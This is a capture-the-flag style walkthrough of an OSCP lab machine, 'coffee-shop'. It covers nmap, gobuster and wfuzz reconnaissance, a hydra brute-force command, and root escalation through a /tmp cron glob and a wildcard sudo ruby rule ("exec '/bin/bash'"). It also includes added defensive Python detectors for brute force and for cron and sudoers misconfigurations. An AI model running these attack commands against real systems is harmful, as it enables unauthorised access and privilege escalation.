OSCP Lab
Lab overview
| Machine | Difficulty | Topics |
| coffee-shop | easy | information gathering, credential harvesting, cron privilege escalation, sudo privilege escalation |
Information gathering
Host discovery
└─# nmap -sn 192.168.31.0/24
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-12 07:48 EST
Nmap scan report for XiaoQiang (192.168.31.1)
Host is up (0.0060s latency).
MAC Address: D4:DA:21:93:9E:34 (Beijing Xiaomi Mobile Software)
Nmap scan report for 192.168.31.11
Host is up (0.0059s latency).
MAC Address: BC:6E:E2:36:A6:64 (Intel Corporate)
Nmap scan report for 192.168.31.20
Host is up (0.0010s latency).
MAC Address: 08:00:27:2A:FE:97 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.31.34
Host is up (0.057s latency).
MAC Address: CA:BF:4C:0C:6D:37 (Unknown)
Nmap scan report for 192.168.31.181
Host is up.
Port scan
└─# nmap -sV -A -p- -T4 192.168.31.20
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-12 07:48 EST
Nmap scan report for 192.168.31.20
Host is up (0.0027s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 81:a4:52:2b:14:3f:13:68:2b:e2:5b:c4:7b:d7:1a:a5 (ECDSA)
|_ 256 25:19:09:29:2f:b8:ea:b4:29:1f:6d:e7:13:d6:be:7e (ED25519)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Under Construction - Midnight Coffee
|_http-server-header: Apache/2.4.52 (Ubuntu)
MAC Address: 08:00:27:2A:FE:97 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 2.73 ms 192.168.31.20
Add the domain name (midnight.coffee, used by the scans below)
Directory scan
gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://midnight.coffee -x php,html,txt -e
gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://midnight.coffee/shop -x php,html,txt -e
hydra -l shopadmin -P /usr/share/wordlists/rockyou.txt 192.168.31.20 http-post-form "/:username=shopadmin&password=^PASS^:invalid"
Subdomain enumeration
wfuzz -c -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://midnight.coffee -H 'HOST: FUZZ.midnight.coffee' --hh 1690
After adding the subdomain and browsing to it, the back-end account credentials are obtained directly; logging in there yields the SSH account credentials.
Gaining access
Using the credentials obtained above, log in successfully as the tuna account.
Credential harvesting turns up the MySQL credentials; after logging in to the database, the shopadmin user's credentials are found.
Brute force (the hydra run above) failed.
Privilege escalation
viminfo reveals a scheduled task (cron job).
It can be seen that the job runs *.sh files, so simply writing a script file with the .sh suffix into the /tmp directory is enough.
Because the path allowed by sudo contains a wildcard (*), another executable script can be inserted at that position in the path to escalate privileges.
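The hydra run against the login form above is exactly the kind of activity a web server's access log records, whether or not it succeeds. The following is an added example (not part of the original writeup) of the detection logic a defender would run over Apache combined-format log lines: it parses each record and flags any client that sends a burst of POST requests to one path within a sliding window. The log lines, IPs, sizes and User-Agent strings are constructed for the example; the threshold and window are tunable parameters, not values from the page.

```python
import re
from collections import defaultdict
from datetime import datetime

# Apache "combined" access-log format; only the fields needed for rate analysis are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log (not from the lab machine): a burst of twelve POSTs to the
# login form from one client within a few seconds, some normal traffic, and a malformed line.
SAMPLE_LOG = [
    f'192.168.31.181 - - [12/Feb/2024:07:55:{s:02d} -0500] "POST / HTTP/1.1" 200 1802 "-" "Mozilla/4.0 (Hydra)"'
    for s in range(1, 13)
] + [
    '192.168.31.11 - - [12/Feb/2024:07:55:05 -0500] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.168.31.11 - - [12/Feb/2024:07:55:06 -0500] "POST / HTTP/1.1" 200 1802 "-" "Mozilla/5.0"',
    'this line is deliberately not a valid access-log record',
]


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": m.group("method"),
        "path": m.group("path"),
        "status": int(m.group("status")),
        # Apache writes "-" when no body was sent.
        "size": int(m.group("size")) if m.group("size").isdigit() else 0,
    }


def detect_bruteforce(lines, threshold=10, window_seconds=60):
    """Return {(ip, path): count} for clients whose POSTs to a single path reach
    `threshold` inside any sliding window of `window_seconds`."""
    stamps_by_key = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        stamps_by_key[(rec["ip"], rec["path"])].append(rec["ts"])

    alerts = {}
    for key, stamps in stamps_by_key.items():
        stamps.sort()
        start, peak = 0, 0
        for end, t in enumerate(stamps):
            # Advance the window start until the window spans at most window_seconds.
            while (t - stamps[start]).total_seconds() > window_seconds:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[key] = peak
    return alerts


if __name__ == "__main__":
    for (ip, path), count in detect_bruteforce(SAMPLE_LOG).items():
        print(f"possible credential brute force: {ip} sent {count} POSTs to {path}")
```

The check keys on client and path rather than on response status, because a form that answers every attempt with 200 (as the hydra command's "invalid" failure string implies here) gives no status-code signal; on a real server the same logic would feed a rate limit or account lockout rather than only a report.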
echo "exec '/bin/bash'" > /tmp/shell.rb
sudo /usr/bin/ruby /tmp/shell.rb /opt/shop.rb
script /dev/null -c bash
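Both escalation paths on this machine come from the same class of misconfiguration: a privileged job or sudo rule that lets an unprivileged user choose which file gets executed, via a shell glob over a world-writable directory (the cron job running /tmp/*.sh) or a wildcard argument in a sudoers command spec. The following is an added example, not code from the original writeup, of an auditor a defender would run to find such entries before anyone else does. The crontab and sudoers lines are constructed samples; the sudoers line in particular is an assumption that only mirrors the shape of the sudo command used above, since the page never shows the real rule. Directory modes are supplied through a table so the example runs offline; on a live host `live_mode` stats the real paths.

```python
import os
import re
import shlex
import stat

WILDCARD = re.compile(r"[*?\[]")

# System crontab line: five time fields (or an @keyword), the run-as user, then the command.
CRON_RE = re.compile(r"^\s*(?:@\w+|(?:\S+\s+){4}\S+)\s+(?P<user>\S+)\s+(?P<cmd>.+?)\s*$")

# sudoers user specification: who host=(runas) [TAG:]... command[, command...]
SUDOERS_RE = re.compile(
    r"^\s*(?P<who>\S+)\s+(?P<host>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+?)\s*$"
)

# Constructed samples (not copied from the lab machine). The sudoers line is an assumption
# that merely matches the shape of the sudo command used in the writeup.
SAMPLE_CRONTAB = [
    "# /etc/crontab (constructed sample)",
    '*/1 * * * * root for f in /tmp/*.sh; do /bin/bash "$f"; done',
    "0 3 * * * root /usr/bin/find /var/log -name '*.gz' -delete",
]
SAMPLE_SUDOERS = [
    "# constructed sudoers sample",
    "Defaults env_reset",
    "tuna ALL=(ALL) NOPASSWD: /usr/bin/ruby * /opt/shop.rb",
    "tuna ALL=(ALL) /usr/bin/systemctl restart apache2",
]
# Directory modes as os.stat().st_mode reports them: /tmp is 1777, /var/log is 755.
SAMPLE_MODES = {"/tmp": 0o41777, "/var/log": 0o40755}


def glob_parent(token):
    """Directory in which a glob token expands: the path prefix before its first wildcard."""
    idx = WILDCARD.search(token).start()
    return os.path.dirname(token[:idx]) or "."


def live_mode(path):
    """Mode of a real path, or None if it cannot be stat'ed (for auditing a live host)."""
    try:
        return os.stat(path).st_mode
    except OSError:
        return None


def mode_from_table(table):
    """Offline substitute for live_mode, backed by a {path: mode} dict."""
    return lambda path: table.get(path)


def audit_cron(lines, mode_of=live_mode):
    """Flag absolute-path globs in cron commands and whether their directory is world-writable.
    Only tokens containing both a wildcard and a '/' count, so quoted patterns such as
    find -name '*.gz' (never expanded by the shell) are left alone."""
    findings = []
    for line in lines:
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = CRON_RE.match(line)
        if not m:
            continue
        for token in shlex.split(m.group("cmd")):
            token = token.rstrip(";")
            if "/" not in token or not WILDCARD.search(token):
                continue
            parent = glob_parent(token)
            mode = mode_of(parent)
            findings.append({
                "source": "cron",
                "user": m.group("user"),
                "glob": token,
                "dir": parent,
                # Sticky bit does not help: anyone can still create a matching file there.
                "world_writable": bool(mode is not None and mode & stat.S_IWOTH),
            })
    return findings


def audit_sudoers(lines):
    """Flag sudoers command specs whose command or arguments contain shell wildcards."""
    findings = []
    for line in lines:
        stripped = line.strip()
        if not stripped or stripped.startswith("#") or stripped.startswith("Defaults"):
            continue
        m = SUDOERS_RE.match(line)
        if not m:
            continue
        for spec in m.group("cmds").split(","):
            spec = spec.strip()
            wild = [a for a in shlex.split(spec) if WILDCARD.search(a)]
            if wild:
                findings.append({"source": "sudoers", "user": m.group("who"),
                                 "command": spec, "wildcard_args": wild})
    return findings


if __name__ == "__main__":
    for f in audit_cron(SAMPLE_CRONTAB, mode_from_table(SAMPLE_MODES)) + audit_sudoers(SAMPLE_SUDOERS):
        print(f)
```

A finding from `audit_cron` with `world_writable` set is the cron case on this box; the fix is to have the job read scripts from a root-owned directory, not /tmp. A finding from `audit_sudoers` is the ruby case; the fix is to spell out the exact arguments the rule is meant to permit, because sudo matches `*` against any string, including another script path.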
End
Originally published on the WeChat official account 贝雷帽SEC: [OSCP] coffee-shop